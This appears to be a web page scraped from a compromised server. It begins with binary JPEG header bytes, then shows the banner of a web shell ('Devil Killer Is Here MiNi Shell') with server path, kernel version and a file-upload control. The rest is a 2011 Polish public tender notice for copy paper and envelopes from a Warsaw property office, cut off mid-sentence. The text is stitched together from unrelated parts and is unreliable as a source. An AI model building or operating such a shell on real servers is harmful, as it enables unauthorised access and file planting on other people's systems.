JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110112/4140-N-2011.html

<p class="kh_header"><b>Warszawa: Sprzedaż i dostarczenie papieru ksero, papieru komputerowego, kopert dla Zakładu Gospodarowania Nieruchomościami w Dzielnicy Mokotów m. st. Warszawy.</b><br>
<b>Numer ogłoszenia: 4140 - 2011; data zamieszczenia: 12.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarowania Nieruchomościami w dzielnicy Mokotów m.st. Warszawy , ul. Irysowa 19, 02-660 Warszawa, woj. mazowieckie, tel. 022 5493727, 5493737, faks 022 5493737.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgnmokotow.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzedaż i dostarczenie papieru ksero, papieru komputerowego, kopert dla Zakładu Gospodarowania Nieruchomościami w Dzielnicy Mokotów m. st. Warszawy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Określenie przedmiotu zamówienia:

1.1.   Przedmiotem zamówienia jest sprzedaż oraz sukcesywne dostarczanie następującego asortymentu i ilości papieru ksero, papieru komputerowego, kopert:
1.1.1. papier ksero A-4 (biały) - 4600 ryz (po 500 arkuszy papieru w ryzie),
1.1.2. papier ksero A-3 (biały) - 200 ryz (po 500 arkuszy papieru w ryzie),
1.1.3. papier komputerowy:
1.1.3.1. 240 (1+0) - 2 kartony,
1.1.3.2. 240 (1+1) - 2 kartony,
1.1.3.3. 240 (1+2) - 2 kartony,
1.1.3.4. 240 (1+1) oryginał kopia - 30 kartonów,
1.1.3.5. 360 (1+0) - 2 kartony,
1.1.3.6. 360 (1+1) - 2 kartony,
1.1.3.7. 360 (1+2) - 2 kartony,
1.1.3.8. polecenia przelewu na składance komputerowej z 1 kopią; druki muszą spełniać wymogi sektora bankowego (odpowiednia szerokość kartek, górne narożniki obramowane) - 1 karton,
1.1.4. koperty utajnione 240x6 - 6 kartonów po 1200 sztuk w opakowaniu,
1.1.5. koperty:
1.1.5.1. koperty białe C6 (samoklejące) w pakietach po 1000 szt. - 70 pakietów,
1.1.5.2. koperty białe DL prawe okno (samoklejące) w pakietach po 1000 szt. - 60 pakietów,
1.1.5.3. koperty brązowe B4 (samoklejące) w pakietach po 250 szt. - 30 pakietów,
1.1.5.4. koperty brązowe B5 (samoklejące) w pakietach po 500 szt. - 15 pakietów,
1.1.5.5. koperty brązowe B6 (samoklejące) w pakietach po 500 szt. - 15 pakietów. 

1.2. Papier ksero, o którym mowa w pkt. 3.1.1. - 3.1.2. musi odpowiadać następującym parametrom i wymogom:
1.2.1. gramatura 80 g m2 ? 2,
1.2.2. grubość minimum 108 ?m ? 3,
1.2.3. białość w skali CIE minimum 161 ? 2,
1.2.4. wilgotność 3,8% - 5,0%,
1.2.5. papier powinien być biały, wybielony bezchlorowo, bezpyłowy, niemarszczący się podczas kserowania i wydruku na drukarce laserowej klasy B lub wyższej, np. nie gorszy niż Pollux Kwidzyn,
1.2.6. Oferowany papier ksero (zarówno A-3, jak i A-4) musi pochodzić od tego samego producenta danego papieru. Zaproponowany rodzaj papieru nie może być zmieniony w trakcie realizacji umowy.
1.2.7. Dla oferowanego papieru ksero Wykonawca zobowiązany jest dostarczyć do oferty specyfikację papieru od producenta.
1.2.8. Oferowany papier musi spełniać wymogi stawiane przez producentów kserokopiarek MITA, RANK XEROX, CANON, PANASONIC oraz wymogi stawiane przez producentów drukarek komputerowych  HEWLETT PACKARD, XEROX, MINOLTA.

1.3. Papier komputerowy, o którym mowa w pkt. 3.1.3. specyfikacji istotnych warunków musi być wyprodukowany z bezpyłowego i bezdrzewnego papieru offsetowego (zalecana gramatura 60 lub 70 g m2), składanka wielowarstwowa powinna posiadać gwarancje min. 5 lat na zdolność kopiowania i gwarancje min. 25 lat na trwałość kopii; gramatura papieru samokopiującego: pierwsza warstwa CB 56 g m2 - pośrednie warstwy CFB 53-54 g m2 - ostatnia warstwa CF 57 g m2, pakowanie: składanka 1 warstwowa (1+0) - 2000 składek 12  w kartonie: składanka 2 warstwowa (1+1) - 900 składek 12  w kartonie; składanka 3 warstwowa (1+2) - 600 składek 12  w kartonie; kolory poszczególnych warstw pierwsza warstwa - biała, pośrednia warstwa - żółta; ostatnia warstwa - różowa. Polecenie przelewu bankowego z 1 kopią - druki muszą spełniać wymogi sektora bankowego (odpowiednia szerokość kartek, górne narożniki obramowane). 

1.4. Wykonawca zobowiązuje się do sprzedaży i dostarczania papieru komputerowego z kolorowymi kopiami przy czym papier z jedną kopią będzie zawierał różową kopię, a papier z dwoma kopiami będzie zawierał jedną kopię w kolorze różowym, a drugą- w żółtym (kolejność dowolna), polecenia przelewu na składance komputerowej z trzema kopiami które musi zawierać: 1 stronę różowa, jedną kopię szarą, jedną kopię zieloną i jedną kopię żółtą.

1.5. Wykonawca zobowiązuje się do udzielenia na dostarczony papier ksero, papier komputerowy i koperty 12 miesięcznej gwarancji o treści zwyczajowo przyjętej i stosowanej w obrocie papierem i kopertami.

1.6. Koperty utajnione, o których mowa w pkt. 3.1.4. specyfikacji istotnych warunków zamówienia - druk utajniony składa się ze strony jawnej - oryginału oraz sklejonej z dwóch kartek koperty, której otworzenie jest możliwe tylko poprzez rozerwanie lub obcięcie brzegu. Szerokość kopert  (mierzona wraz z perforacją) 240 mm, wysokość 6. 

1.7. Papier ksero, papier komputerowy, koperty, o których mowa w pkt. 3.1.1. - 3.1.5., specyfikacji będą sukcesywnie dostarczane do siedziby Zakładu Gospodarowania Nieruchomościami w Dzielnicy Mokotów m. st. Warszawy, przy ul. Irysowej 19 i ul. Tuchlińskiej 1 oraz ul. Bachmackiej 1A w Warszawie oraz do siedzib 6 DOM-ów.

1.8. Wykaz siedzib ZGN i DOM zawiera rozdział IV  specyfikacji.
 
1.9. Papier ksero, papier komputerowy, koperty muszą być wniesione przez Wykonawcę do magazynów znajdujących się pod wskazanymi przez Zamawiającego adresami, o których mowa w pkt. 3.7.  specyfikacji, w ciągu dwóch dni kalendarzowych od otrzymania telefonicznej informacji o konieczności dostawy określonej ilości i asortymentu papieru ksero, papieru komputerowego, kopert oraz po potwierdzeniu zapotrzebowania faxem.

1.10. Zamawiający będzie określał w zapotrzebowaniu ilości i typy zamawianego papieru ksero, papieru komputerowego, kopert.

1.11. Koszty załadunku, transportu oraz rozładunku i wniesienia do magazynów Zamawiającego wszystkich dostaw obciążać będą dostawcę.

1.12. W okresie obowiązywania umowy Zamawiający zastrzega sobie prawo zmiany ilości zapotrzebowania na poszczególne typy papieru ksero, papieru komputerowego, kopert w ramach ceny realizacji zamówienia.

1.13. Zamawiający zastrzega sobie możliwość rezygnacji z zakupu pewnej części papieru ksero, papieru komputerowego oraz kopert, o którym w pkt. 3.1.1. - 3.1.5. specyfikacji istotnych warunków zamówienia oraz w formularzu cenowym będącym załącznikiem nr 1 do oferty, jednakże nie więcej niż do 20% wartości zamówienia.

1.14. Podstawą obliczenia wartości poszczególnych dostaw będą ceny jednostkowe papieru ksero, papieru komputerowego i kopert wymagane przez Zamawiającego do sukcesywnego dostarczania, wskazane przez dostawcę w formularzu cenowym (załącznik nr 1 do oferty).

1.15. Ceny przedstawione przez Wykonawcę w formularzu cenowym (załącznik nr 1 do oferty) będą cenami obowiązującymi przez cały czas trwania umowy i nie będą podlegały żadnym zmianom lub waloryzacji.

1.16. W przypadku stwierdzenia przez Zamawiającego, iż którakolwiek z dostarczonych partii papieru ksero, papieru komputerowego i kopert posiada wady, dostawca zobowiązany będzie do dokonania na własny koszt jej wymiany na produkty niewadliwe w ciągu dwóch dni od telefonicznego, potwierdzonego faxem zgłoszenia Wykonawcy istnienia wady.

1.17. W przypadku uszkodzenia urządzenia, którego przyczyną będzie użycie dostarczonego papieru ksero i papieru komputerowego Wykonawca zobowiązany będzie do zwrotu kosztów naprawy urządzenia, a także zleconej przez Zamawiającego ekspertyzy niezależnego rzeczoznawcy. 

1.18. W przypadku stwierdzenia przez Zamawiającego, że dostarczony papier ksero nadmiernie pyli, elektryzuje się, chłonie wilgoć, wygina się, Zamawiający zastrzega sobie możliwość odstąpienia od umowy. 

1.19. Wykonawca zobowiązany jest - najpóźniej do dnia   20.01.2011 r. do godz. 1000 - do dostarczenia do siedziby Zamawiającego (pokój nr 34), niżej wymienionych próbek papieru:

LP.	PRZEDMIOT	JEDNOSTKA	ILOŚĆ
1.	Papier ksero A-4	KARTKA	20
2.	Papier ksero A-3	KARTKA	20

Oferta Wykonawcy, który nie złoży wyżej wymienionych próbek zostanie odrzucona.

1.20. Próbki zaoferowanego papieru ksero muszą być opisane i opakowane w oryginalne opakowania fabryczne.
1.21. Dostarczone próbki, o których mowa w pkt. 3.19. specyfikacji nie zostaną zwrócone, ponieważ zamawiający będzie je testował w kserokopiarkach i drukarkach.

1.22. Szczegółowy zakres obowiązków Wykonawcy zawarty jest w § 1 istotnych postanowień umowy, które stanowią Rozdział III do  specyfikacji.
       1.22.1.Zamawiający zastrzega sobie możliwość wprowadzenia zmian postanowień 
                  umowy o ile  warunkiem wprowadzenia takich zmian będą między innymi  
                  okoliczności, których nie  można było przewidzieć w chwili zawarcia umowy lub 
                  zmiany te będą korzystne dla Zamawiającego. Zamawiający dopuszcza możliwość 
                  zmiany umowy w szczególności w następujących przypadkach:
a) zmiany stawki podatku od towarów i usług (VAT);
b) zmiany regulacji prawnych wprowadzonych w życie po dacie zawarcia umowy          wraz ze skutkami takiej zmiany regulacji prawnych;
c) ograniczenia środków budżetowych na realizację Przedmiotu niniejszej umowy;
d) ograniczenia zakresu rzeczowego i finansowego;
e)zmiany osób uczestniczących w realizacji Przedmiotu niniejszej umowy;
       f) zmiany wymaganej sprawozdawczości i rozliczeń kosztów wykonania Przedmiotu 
           niniejszej umowy;
       g) zmiany adresów dostarczania papieru kserograficznego.
    1.22.2.Wykonawca może dokonać zmiany Podwykonawców w sytuacji, gdy z przyczyn, 
               których nie można było przewidzieć w chwili zawarcia umowy, koniecznym będzie 
               dla prawidłowego wykonania umowy posłużenie się przez Wykonawcę nowymi 
               Podwykonawcami, którzy będą realizowali część lub cały zakres powierzony 
               uprzednio innym Podwykonawcom.
    1.22.3. Zmiana umowy wymaga sporządzenia aneksu w formie pisemnej pod rygorem
                nieważności.
1.23. Czynności, o których mowa w  pkt. 3  specyfikacji mają być wykonane zgodnie z warunkami wynikającymi z Istotnych postanowień umowy stanowiących Rozdział III specyfikacji istotnych warunków zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>13.	Zamawiający  przewiduje możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 20 % wartości zamówienia podstawowego, o których mowa w art. 67 ust. 1 pkt  7 ustawy zamówień z dnia 29 stycznia 2004r. Prawo zamówień publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.44-2, 30.19.76.30-1, 30.19.76.40-4, 30.19.92.30-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W przedmiotowym postępowaniu wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania na podstawie art. 24 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2010 r. Nr 113, poz. 759 ze zm.), a także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 w/w ustawy dotyczące:
a) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
                  b) posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d) sytuacji ekonomicznej i finansowej,
         Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 2 do wzoru formularza oferty (pkt. 9.2.1. specyfikacji istotnych warunków zamówienia) oraz w oparciu o potwierdzenie spełniania warunków w zakresie wskazanym poniżej:

1.1.Zamawiający oceni jako spełniony, warunek posiadania przez Wykonawcę wiedzy i doświadczenia, na podstawie wykazu dostaw, z którego wynikać będzie, że Wykonawca w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje  należycie co najmniej 1 dostawę polegającą na dostawach papieru ksero do firm lub instytucji o wartości nie mniejszej niż 50.000,- zł. brutto (w przypadku wykazania doświadczenia dostawami wykonywanymi Zamawiający żąda, żeby Wykonawca wykazał, nie później niż na dzień składania ofert wykonanie części dostawy o wartości co najmniej 50.000,- zł. brutto). W tym celu Wykonawca musi wypełnić wykaz dostaw stanowiący załącznik nr 3 do wzoru formularza oferty oraz załączyć dokumenty potwierdzające, że dostawa ta została wykonana lub jest wykonywana należycie.
1.2.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, 
        osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych
        podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. 
        Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż 
        będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 
Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający żąda wykazania za pomocą dokumentów wymaganych w pkt. 9.3.  specyfikacji istotnych warunków zamówienia, iż w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 ustawy,  o ile podmioty te będą brały udział w realizacji części zamówienia. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunki, o których mowa w art. 22 ust. 1 mogą być spełnione  łącznie. 
 
1.3.W przypadku gdy Wykonawca polegać będzie na doświadczeniu, potencjale 
                  technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach
                  finansowych innych podmiotów niezależnie od charakteru prawnego łączących go 
                  z nimi stosunków, zobowiązany jest udowodnić, iż będzie dysponował zasobami 
                  niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym
                  celu: 
1.3.1.pisemne zobowiązanie tych podmiotów do zrealizowania części zamówienia zawierające zakres robót, które te podmioty zobowiązują się wykonać - w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na wiedzy i doświadczeniu innych podmiotów zakresie realizacji części zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełnienia warunku i za spełnienie tego warunku uzna złożenie oświadczenia, o którym mowa w pkt. 9.2.1.  siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełnienia warunku i za spełnienie tego warunku uzna złożenie oświadczenia, o którym mowa w pkt. 9.2.1.  siwz.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełnienia warunku i za spełnienie tego warunku uzna złożenie oświadczenia, o którym mowa w pkt. 9.2.1.  siwz.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">na podstawie załączonej do oferty specyfikacji papieru ksero wydanej 
                               przez  producenta oferowanego papieru ksero, potwierdzającej, że 
                       oferowany papier ksero spełnia wymogi określone przez Zamawiającego w pkt. 
                       3.2.  specyfikacji.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.wypełniony i podpisany formularz oferty zgodny w treści ze wzorem stanowiącym Rozdział II specyfikacji istotnych warunków zamówienia,

2.wypełniony i podpisany formularz cenowy na załączniku nr 1 do oferty wg wzoru załączonego do wzoru formularza oferty,

3. oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza pełnomocnictwa, o którym mowa w pkt. 9.5.1.2.  specyfikacji, jeżeli oferty będą składali Wykonawcy wspólnie ubiegający się o udzielenie zamówienia,
4.oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza pełnomocnictwa, o którym mowa w pkt. 14.7.3. specyfikacji, jeśli oferta będzie podpisana przez pełnomocnika,
5.informację o części / częściach zamówienia, które Wykonawca zamierza powierzyć podwykonawcom, o ile Wykonawca będzie realizował zamówienie z udziałem podwykonawców,
6. informację o podmiotach, które będą brały udział w realizacji  części zamówienia, na  zasobach których polega wykonawca na zasadach określonych w pkt. 8.2. siwz,
7. informacji określonej w pkt. 16.1.2. specyfikacji w przypadku zastosowania  przez wykonawcę innej niż (23 % ) stawki podatku od towarów i usług,
8.W celu wykazania spełniania przez Wykonawcę warunków udziału w postępowaniu, o  których mowa w pkt. 8 SIWZ, Wykonawca zobowiązany jest złożyć wraz z ofertą następujące dokumenty: 
8.1.oświadczenie na załączniku nr 2 do oferty wg wzoru załączonego do wzoru formularza oferty, że Wykonawca spełnia warunki określone w art. 22 ust.1 ustawy Prawo zamówień publicznych, 
8.2.wykaz dostaw, o których mowa w pkt. 8.1.1. specyfikacji na załączniku nr 3 do oferty wg wzoru załączonego do wzoru formularza oferty, wykonanych lub wykonywanych przez Wykonawcę należycie w okresie ostatnich 3 lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z załączeniem dokumentów potwierdzających, że dostawy te zostały wykonane lub są wykonywane należycie.
8.3.dokumenty potwierdzające należyte wykonanie lub wykonywanie dostaw wykazanych przez Wykonawcę w załączniku nr 3 do oferty (zgodnie z zapisem pkt. 8.1.1. i 9.2.2. specyfikacji istotnych warunków zamówienia),
8.4.W przypadku gdy Wykonawca polegać będzie na doświadczeniu, potencjale 
                  technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach
